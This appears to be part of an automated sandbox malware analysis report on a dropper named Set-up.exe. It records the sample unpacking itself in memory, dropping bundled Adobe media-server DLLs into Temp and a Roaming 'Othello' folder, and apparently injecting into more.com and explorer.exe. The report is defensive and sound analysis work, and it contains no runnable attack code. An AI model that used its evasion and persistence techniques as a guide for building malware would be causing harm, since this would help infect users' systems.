                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: wevtapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: shdocvw.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeSection loaded: fswwa.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeSection loaded: fswwa.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\more.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
                  Source: Set-up.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: Set-up.exeStatic file information: File size 6513152 > 1048576
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile opened: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\msvcr100.dllJump to behavior
                  Source: Set-up.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x602600
                  Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamarshal\lib\win\release\32\dvamarshal.pdb source: Server.exe, 0000000C.00000002.2383590113.0000000000880000.00000002.00000001.01000000.0000000E.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2450996101.0000000000C10000.00000002.00000001.01000000.0000000E.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_date_time\lib\win\release\32\boost_date_time.pdb source: Server.exe, 0000000C.00000002.2388499779.00000000014EA000.00000002.00000001.01000000.0000001C.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2452932471.00000000014EA000.00000002.00000001.01000000.0000001C.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dynamiclink\dynamiclink\lib\win\release\32\dynamiclink.pdb source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLFoundation.pdb source: Server.exe, 0000000C.00000002.2387826797.0000000001185000.00000002.00000001.01000000.00000014.sdmp, Server.exe, 0000000F.00000002.2452133018.0000000001185000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_threads\lib\win\release\32\boost_threads.pdb source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2388668803.0000000001523000.00000002.00000001.01000000.0000001D.sdmp, Server.exe, 0000000F.00000002.2453076234.0000000001523000.00000002.00000001.01000000.0000001D.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdb source: Server.exe, 0000000C.00000002.2388342902.000000000136C000.00000002.00000001.01000000.00000017.sdmp, Server.exe, 0000000C.00000002.2383652464.000000000095C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2452791153.00000000014AC000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: wntdll.pdbUGP source: Server.exe, 0000000C.00000002.2397298684.000000000B9D3000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397620533.000000000C0E5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397448269.000000000BD30000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000D.00000002.2471368997.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000D.00000002.2470509483.000000000444D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461798889.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461583394.000000000BBE0000.00000004.00000800.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461443949.000000000B884000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2482810467.00000000040BC000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2485051962.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3679344144.0000000005670000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdbp source: Server.exe, 0000000F.00000002.2450681224.0000000000B14000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: wntdll.pdb source: Server.exe, 0000000C.00000002.2397298684.000000000B9D3000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397620533.000000000C0E5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397448269.000000000BD30000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000D.00000002.2471368997.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000D.00000002.2470509483.000000000444D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461798889.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461583394.000000000BBE0000.00000004.00000800.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461443949.000000000B884000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2482810467.00000000040BC000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2485051962.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3679344144.0000000005670000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdbPH,[G source: Server.exe, 0000000C.00000002.2383652464.000000000095C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLUnitTesting.pdbP source: Server.exe, 0000000C.00000002.2392203293.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp, Server.exe, 0000000F.00000002.2456416345.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\MediaFoundation.pdb source: Server.exe, 0000000C.00000002.2388207711.00000000012B0000.00000002.00000001.01000000.00000016.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2452454538.00000000012B0000.00000002.00000001.01000000.00000016.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvacore\lib\win\release\32\dvacore.pdb source: Server.exe, 0000000C.00000002.2383984278.0000000000B7E000.00000002.00000001.01000000.0000000B.sdmp, Server.exe, 0000000F.00000002.2450483452.0000000000A1E000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: d:\users\nbtester\x86win_nightly\branch-14_0\20130730_000000\dev\build_objs\x86win_d0p0flexlm\libobj\svml\sharedmd\svml_dispmd_full_pdb.pdb source: Server.exe, 0000000C.00000002.2389338172.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp, Server.exe, 0000000C.00000003.2353968785.000000000C15D000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C017000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2453668794.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\Memory.pdb source: Server.exe, 0000000C.00000002.2392305204.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp, Server.exe, 0000000F.00000002.2456559187.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp
                  Source: Binary string: d:\users\nbtester\x86win_nightly\branch-14_0\20130730_000000\dev\build_objs\x86win_d0p0flexlm\libobj\svml\sharedmd\svml_dispmd_full_pdb.pdb` source: Server.exe, 0000000C.00000002.2389338172.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp, Server.exe, 0000000C.00000003.2353968785.000000000C15D000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C017000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2453668794.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ImageRenderer.pdb source: Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2387210258.0000000001091000.00000002.00000001.01000000.00000012.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2451595701.0000000001091000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLUnitTesting.pdbPA source: Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdbPL source: Server.exe, 0000000F.00000002.2452791153.00000000014AC000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: d:\users\nbtester\x86win_nightly\branch-14_0\20130730_000000\dev\build_objs\x86win_d0p0flexlm\libobj\libm\md\libmmd.pdb source: Server.exe, 0000000C.00000002.2398521146.00000000101F1000.00000002.00000001.01000000.00000019.sdmp, Server.exe, 0000000F.00000002.2463471681.00000000101F1000.00000002.00000001.01000000.00000019.sdmp
                  Source: Binary string: msvcr100.i386.pdb source: Server.exe, 0000000C.00000002.2399201545.000000006D051000.00000020.00000001.01000000.00000010.sdmp, Server.exe, 0000000F.00000003.2423525477.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2463800741.000000006D0B1000.00000020.00000001.01000000.00000010.sdmp
                  Source: Binary string: msvcp100.i386.pdb source: Server.exe, 0000000C.00000002.2399662755.000000006D111000.00000020.00000001.01000000.0000000F.sdmp, Server.exe, 0000000F.00000002.2463953503.000000006D171000.00000020.00000001.01000000.0000000F.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdb source: Server.exe, 0000000C.00000002.2383286120.0000000000674000.00000002.00000001.01000000.0000000C.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2450681224.0000000000B14000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\PRM.pdbP source: Server.exe, 0000000C.00000002.2387654978.0000000001123000.00000002.00000001.01000000.00000013.sdmp, Server.exe, 0000000F.00000002.2451989524.0000000001123000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLUnitTesting.pdb source: Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2392203293.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp, Server.exe, 0000000F.00000002.2456416345.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\PRM.pdb source: Server.exe, 0000000C.00000002.2387654978.0000000001123000.00000002.00000001.01000000.00000013.sdmp, Server.exe, 0000000F.00000002.2451989524.0000000001123000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdbP8 source: Server.exe, 0000000C.00000002.2388342902.000000000136C000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdbpC(zB source: Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: E:\bslave-ngproducts\builddir\build\mc_adobe_sdk_dbginfo_win32_ia32_release\mc_enc_dv.pdb source: Server.exe, 0000000C.00000002.2398936453.000000006CE89000.00000002.00000001.01000000.00000018.sdmp, Server.exe, 0000000F.00000002.2464131766.0000000070149000.00000002.00000001.01000000.00000018.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_system\lib\win\release\32\boost_system.pdbPQ source: Server.exe, 0000000F.00000002.2449859124.0000000000514000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLFoundation.pdb` source: Server.exe, 0000000C.00000002.2387826797.0000000001185000.00000002.00000001.01000000.00000014.sdmp, Server.exe, 0000000F.00000002.2452133018.0000000001185000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLMessaging.pdb source: Server.exe, 0000000C.00000002.2388001008.0000000001203000.00000002.00000001.01000000.00000015.sdmp, Server.exe, 0000000F.00000002.2452288985.0000000001203000.00000002.00000001.01000000.00000015.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvacore\lib\win\release\32\dvacore.pdb source: Server.exe, 0000000C.00000002.2383984278.0000000000B7E000.00000002.00000001.01000000.0000000B.sdmp, Server.exe, 0000000F.00000002.2450483452.0000000000A1E000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_system\lib\win\release\32\boost_system.pdb source: Server.exe, 0000000C.00000002.2382831511.0000000000624000.00000002.00000001.01000000.0000000A.sdmp, Server.exe, 0000000F.00000002.2449859124.0000000000514000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\Memory.pdbl` source: Server.exe, 0000000C.00000002.2392305204.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp, Server.exe, 0000000F.00000002.2456559187.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_system\lib\win\release\32\boost_system.pdbPb source: Server.exe, 0000000C.00000002.2382831511.0000000000624000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdbph(zg source: Server.exe, 0000000C.00000002.2383286120.0000000000674000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\Adobe QT32 Server.pdb source: Server.exe, 0000000C.00000002.2382705300.00000000004BB000.00000002.00000001.01000000.00000009.sdmp, Server.exe, 0000000C.00000000.2328182678.00000000004BB000.00000002.00000001.01000000.00000009.sdmp, Server.exe, 0000000F.00000002.2449639002.00000000004BB000.00000002.00000001.01000000.00000009.sdmp, Server.exe, 0000000F.00000000.2399740812.00000000004BB000.00000002.00000001.01000000.00000009.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvatransport\lib\win\release\32\dvatransport.pdb source: Server.exe, 0000000C.00000002.2383495933.0000000000824000.00000002.00000001.01000000.0000000D.sdmp, Server.exe, 0000000F.00000002.2450849542.0000000000BA4000.00000002.00000001.01000000.0000000D.sdmp, Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: E:\bslave-ngproducts\builddir\build\mc_adobe_sdk_dbginfo_win32_ia32_release\mc_enc_dv.pdbP6 source: Server.exe, 0000000C.00000002.2398936453.000000006CE89000.00000002.00000001.01000000.00000018.sdmp, Server.exe, 0000000F.00000002.2464131766.0000000070149000.00000002.00000001.01000000.00000018.sdmp

                  Data Obfuscation

                  barindex
                  Detected unpacking (creates a PE file in dynamic memory)
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeUnpacked PE file: 11.2.K07BOQJSAWQXKEH8FTYNN.exe.2930000.2.unpack
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeUnpacked PE file: 25.2.rareTemp.exe.2990000.2.unpack
                  Source: ertyayyeqtcs.13.drStatic PE information: real checksum: 0x0 should be: 0x5a53f2
                  Source: libmmd.dll.1.drStatic PE information: real checksum: 0x3eeae4 should be: 0x3e9d6d
                  Source: Set-up.exeStatic PE information: real checksum: 0x0 should be: 0x63839f
                  Source: libmmd.dll.12.drStatic PE information: real checksum: 0x3eeae4 should be: 0x3e9d6d
                  Source: ImageRenderer.dll.1.drStatic PE information: section name: .text1
                  Source: ImageRenderer.dll.1.drStatic PE information: section name: .data1
                  Source: ImageRenderer.dll.1.drStatic PE information: section name: _RDATA
                  Source: libmmd.dll.1.drStatic PE information: section name: .trace
                  Source: ImageRenderer.dll.12.drStatic PE information: section name: .text1
                  Source: ImageRenderer.dll.12.drStatic PE information: section name: .data1
                  Source: ImageRenderer.dll.12.drStatic PE information: section name: _RDATA
                  Source: libmmd.dll.12.drStatic PE information: section name: .trace
                  Source: ertyayyeqtcs.13.drStatic PE information: section name: .symtab
                  Source: ertyayyeqtcs.13.drStatic PE information: section name: fey
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_004A63A5 push ecx; ret 12_2_004A63B8
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_00622CA5 push ecx; ret 12_2_00622CB8
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_0066E371 push ecx; ret 12_2_0066E384
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_0066E515 push ecx; ret 12_2_0066E528
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_004A63A5 push ecx; ret 15_2_004A63B8
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_00512CA5 push ecx; ret 15_2_00512CB8
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_009E8AE5 push ecx; ret 15_2_009E8AF8
                  Source: msvcr100.dll.1.drStatic PE information: section name: .text entropy: 6.909044922675825
                  Source: msvcr100.dll.12.drStatic PE information: section name: .text entropy: 6.909044922675825
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\ImageRenderer.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Memory.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\VideoFrame.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\VideoFrame.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\dvacore.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\mc_enc_dv.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\boost_system.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\msvcp100.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\Memory.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\boost_date_time.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\msvcr100.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\dvamediatypes.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\ASLFoundation.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\dvatransport.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\boost_system.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\ASLUnitTesting.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\ASLMessaging.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\boost_threads.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\ASLUnitTesting.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\ImageRenderer.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\dvamarshal.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\PRM.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\dvamarshal.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\ASLMessaging.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\dvatransport.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeFile created: C:\Users\user\AppData\Local\Temp\rareTemp.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\dynamiclink.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\dvamediatypes.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\boost_date_time.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\boost_threads.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\ASLFoundation.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\MediaFoundation.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\dvacore.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\libmmd.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\svml_dispmd.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\more.comFile created: C:\Users\user\AppData\Local\Temp\ertyayyeqtcsJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\libmmd.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\MediaFoundation.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\svml_dispmd.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\msvcp100.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\msvcr100.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeFile created: C:\Users\user\AppData\Roaming\Othello\mc_enc_dv.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeJump to dropped file
